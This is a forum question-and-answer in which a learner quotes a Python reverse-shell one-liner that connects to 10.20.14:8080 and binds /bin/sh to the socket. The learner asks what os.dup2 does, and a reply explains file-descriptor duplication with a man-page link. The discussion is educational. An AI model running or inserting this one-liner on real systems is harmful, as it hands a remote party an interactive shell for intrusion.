I am learning python and hacking stuff, when I came across the following code snippet:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.20.14",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
It's shell code to get a reverse shell. I do understand python code but I am not able to figure out what that os.dup2() is for and what is it doing there, and on the last line it's written p=subprocess.call(["/bin/sh","-i"]), How the p variable is being executed
If possible answer in detail along with resourses from which I can do further more research.
dup2() is a system call which duplicates an existing file descriptor. See https://man7.org/linux/man-pages/man2/dup.2.html.
File descriptors 0, 1 and 2 are standard input, standard output and standard error, so what this code is doing is duplicating each of those file descriptors (which are associated with the socket) to another file descriptor for the use of the invoked /bin/sh process.